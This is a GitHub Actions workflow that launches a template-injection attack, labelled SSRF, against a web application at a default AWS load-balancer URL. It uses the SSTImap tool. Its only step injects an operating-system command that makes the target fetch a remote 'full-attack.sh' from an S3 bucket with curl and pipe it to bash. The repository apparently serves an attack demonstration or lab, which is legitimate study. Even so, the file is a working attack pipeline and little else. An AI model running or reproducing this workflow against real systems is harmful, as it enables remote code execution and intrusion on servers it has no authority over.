name: XX-1_Run_Attack v1 - Server-Side Request Forgery (SSRF)

on:
  # push:
  #  branches:
  #    - main
  workflow_dispatch:
    inputs:
      APP_URL:
        description: 'URL of the web application to attack'
        required: true
        default: 'http://a568eccbd07e744ea98e9d7c9cd4a597-607046943.eu-west-3.elb.amazonaws.com/'


jobs:
    attack-job:
        runs-on: ubuntu-latest
          
        steps:
            - name: Checkout repository
              uses: actions/checkout@v3

            - name: Run Full Attack
              run: |
                docker run chrisley75/sstimap:1.0.3 \
                  -u "${{ github.event.inputs.APP_URL }}page?name=attack" \
                  --os-cmd "curl -s https://kubecley.s3.eu-west-3.amazonaws.com/full-attack.sh | bash"